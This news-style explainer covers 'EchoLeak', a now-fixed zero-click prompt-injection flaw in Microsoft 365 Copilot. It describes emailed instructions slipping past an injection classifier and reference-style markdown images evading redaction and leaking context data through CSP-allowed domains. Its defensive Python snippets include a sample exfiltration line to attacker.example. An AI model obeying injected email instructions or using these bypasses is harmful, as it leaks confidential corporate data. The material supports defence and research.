M365 Copilot: Emerging Zero-Click AI Vulnerability Facilitates Corporate Data Breach

Researchers at Aim Labs have identified a critical zero-click vulnerability in Microsoft 365 Copilot that lets an attacker extract sensitive corporate data simply by sending an email. The vulnerability, named ‘EchoLeak,’ exploits design flaws inherent in Retrieval Augmented Generation (RAG) Copilots. It allows attackers to automatically exfiltrate data from M365 Copilot’s context without requiring any specific user interaction.

The researchers found the flaw using a novel exploitation technique they call ‘Large Language Model (LLM) Scope Violation.’ In their June 11 report, they describe EchoLeak as the first known zero-click AI vulnerability.

Aim Labs reported the flaw to Microsoft in January 2025, and Microsoft developed and deployed a fix by May 2025.

How Microsoft 365 Copilot Uses RAG and LLMs

Microsoft 365 Copilot is an AI assistant built into Microsoft 365 applications such as Word, Excel, PowerPoint, Outlook, and Teams. It combines LLMs (specifically, OpenAI’s GPT models) with data from Microsoft Graph to tailor its responses and power features such as document drafting, email summarization, and presentation generation.

Copilot relies on RAG, which lets the LLM retrieve current information at query time and add it to its prompt context instead of relying only on its training data. As detailed in the Aim Labs report, “M365 Copilot queries the Microsoft Graph to extract relevant details from the user’s organizational environment, including their mailbox, OneDrive storage, M365 Office files, internal SharePoint sites, and Microsoft Teams chat history.” Copilot’s permission model limits each user to data they are already authorized to access, but that data can still include confidential, proprietary, or compliance-sensitive information.
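
To make the RAG flow concrete, here is a deliberately simplified sketch in Python. It is not Copilot’s retrieval pipeline: the `Chunk` type, the word-overlap `score` function, `retrieve`, `build_prompt`, and the sample corpus are all hypothetical. What it illustrates is the property EchoLeak relies on: a retriever ranks content by relevance, not by origin, so an external email that matches the user’s question can land in the same prompt as internal SharePoint data.

```python
from dataclasses import dataclass


@dataclass
class Chunk:
    source: str     # hypothetical label, e.g. "sharepoint" or "mailbox"
    external: bool  # True if the content originated outside the organization
    text: str


def score(query: str, chunk: Chunk) -> int:
    """Toy relevance score: number of lowercase words shared with the query."""
    return len(set(query.lower().split()) & set(chunk.text.lower().split()))


def retrieve(query: str, corpus: list[Chunk], k: int = 2) -> list[Chunk]:
    """Return the k highest-scoring chunks (ties keep corpus order)."""
    return sorted(corpus, key=lambda c: score(query, c), reverse=True)[:k]


def build_prompt(query: str, chunks: list[Chunk]) -> str:
    # Note: `external` is never consulted here. Internal data and the
    # external email's text end up side by side as plain text in one prompt.
    context = "\n".join(f"[{c.source}] {c.text}" for c in chunks)
    return f"Context:\n{context}\n\nUser question: {query}"


corpus = [
    Chunk("sharepoint", False, "Q3 onboarding guide with salary bands and HR policy"),
    Chunk("mailbox", True, "Onboarding guide tips for new employees please follow these steps"),
    Chunk("onedrive", False, "Holiday photos"),
]
query = "summarize the onboarding guide"
top = retrieve(query, corpus)
prompt = build_prompt(query, top)
print(prompt)
```

In this toy corpus, the internal guide and the external email score equally and are both retrieved, so the model receives the email’s text with the same standing as the organization’s own data.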

LLM Scope Violation

During testing, the Aim Labs team demonstrated a new form of indirect prompt injection (tracked as LLM01 in OWASP’s Top 10 for LLM Applications), which they call ‘LLM Scope Violation.’ In this technique, untrusted input from outside the organization (here, the attacker’s email) causes the LLM to access privileged data in its context and leak it, without the user’s knowledge or consent. The full attack chains together several bypasses of Microsoft’s security measures to get the malicious instructions into the LLM and the data back out.



The attack sequence can be broken down as follows:

1. XPIA Bypass: The attacker sends an email containing markdown-formatted instructions aimed at Copilot’s underlying LLM. The email is worded as though the instructions were addressed to the human recipient, which lets it evade Microsoft’s cross-prompt injection attack (XPIA) classifiers.

2. Link Redaction Bypass: The injected instructions tell Copilot to take sensitive company information from its context and embed it in a markdown link to an attacker-controlled URL. Copilot redacts external markdown links from its responses, but writing the link in reference-style markdown evades this redaction.

3. Image Redaction Bypass: A link still requires the user to click it. To exfiltrate data with no user interaction, the attacker instead has Copilot generate a markdown image whose URL carries the sensitive data as a query-string parameter; the browser requests the image, and with it the data, automatically when it renders the response. Reference-style markdown images likewise bypass image redaction.

4. CSP Bypass: The browser’s Content Security Policy (CSP) only allows images to be loaded from an allowlist of domains, which blocks an image URL pointing directly at the attacker’s server. The attackers therefore examined the domains the CSP allows, focusing on SharePoint and Microsoft Teams, to find one that could be used to carry the data out.
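
Steps 2 and 3 hinge on the difference between inline and reference-style markdown. The Python sketch below is a hypothetical redaction filter, not Microsoft’s implementation: `naive_redact` strips only inline links and images (`[text](url)`, `![alt](url)`) whose host is outside an assumed allowlist (`TRUSTED_HOSTS`, holding the placeholder host `contoso.sharepoint.com`), so a reference-style image (`![alt][ref]` plus a separate `[ref]: url` line) passes through untouched. `stricter_redact` additionally deletes reference definitions that point at untrusted hosts.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist used only for this sketch.
TRUSTED_HOSTS = {"contoso.sharepoint.com"}

# Inline link or image: [text](url) or ![alt](url)
INLINE = re.compile(r"!?\[([^\]]*)\]\((\S+?)\)")
# Reference definition at the start of a line: [label]: url
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:\s*(\S+)", re.MULTILINE)


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def naive_redact(markdown: str) -> str:
    """Replace untrusted inline links/images with their text; nothing else."""
    def repl(m: re.Match) -> str:
        return m.group(0) if host_of(m.group(2)) in TRUSTED_HOSTS else m.group(1)
    return INLINE.sub(repl, markdown)


def stricter_redact(markdown: str) -> str:
    """Also delete reference definitions that point at untrusted hosts."""
    def repl(m: re.Match) -> str:
        return m.group(0) if host_of(m.group(2)) in TRUSTED_HOSTS else ""
    return REF_DEF.sub(repl, naive_redact(markdown))


# Reference-style image: the URL lives on its own definition line.
leaky = (
    "Here is the summary you asked for.\n"
    "![logo][ref]\n"
    "\n"
    "[ref]: https://attacker.example/logo.png?d=SECRET\n"
)
print(naive_redact(leaky))     # definition line survives
print(stricter_redact(leaky))  # definition line removed
```

Once the definition is gone, `![logo][ref]` no longer resolves, so a CommonMark renderer shows it as literal text instead of fetching an image. A production filter would work on a parsed markdown tree rather than regular expressions, which miss many edge cases.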

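Step 4 comes down to how a browser checks an image URL against the CSP’s `img-src` directive. The following Python sketch is a simplified, hypothetical model of that check (real browsers also evaluate schemes, ports, paths, and keywords such as `'self'`), and the policy string `CSP` is an illustrative assumption, not Copilot’s actual policy. A direct request to an attacker’s host fails, while any URL on an allowlisted domain passes, which is why the researchers turned their attention to allowlisted services such as SharePoint and Teams.

```python
from urllib.parse import urlparse

# Illustrative policy only; not Copilot's actual CSP.
CSP = "default-src 'self'; img-src 'self' *.sharepoint.com *.teams.microsoft.com"


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [source expressions]}."""
    policy: dict[str, list[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            # Only the first occurrence of a directive is honored.
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def host_matches(host: str, source: str) -> bool:
    """Simplified host-source match: ignores scheme, port, and path."""
    src = source.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0].lower()
    if src.startswith("*."):
        # "*.example.com" matches subdomains, not example.com itself.
        return host.endswith(src[1:])
    return host == src


def img_allowed(url: str, header: str) -> bool:
    """Would this (simplified) policy let the browser load an image from url?"""
    policy = parse_csp(header)
    sources = policy.get("img-src", policy.get("default-src", []))
    host = (urlparse(url).hostname or "").lower()
    # Keywords such as 'self' are skipped in this sketch.
    return any(host_matches(host, s) for s in sources if not s.startswith("'"))


print(img_allowed("https://attacker.example/p.png?d=SECRET", CSP))  # False
print(img_allowed("https://contoso.sharepoint.com/p.png", CSP))     # True
```
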
Identifying Common Design Flaws in RAG Applications and AI Agents

Aim Labs groups this chain of vulnerabilities under the name ‘EchoLeak,’ which combines conventional vulnerabilities with newer AI-specific weaknesses. They conclude, “This is a novel practical attack on an LLM application that adversaries can weaponize. The attack permits the exfiltration of the most sensitive data from the present LLM context, ensuring that the most confidential information is leaked, independent of specific user actions, and can be conducted in both single-turn and multi-turn interactions.”

Although their research focused on M365 Copilot, the researchers say the same weaknesses could be exploited in other RAG applications and AI agents.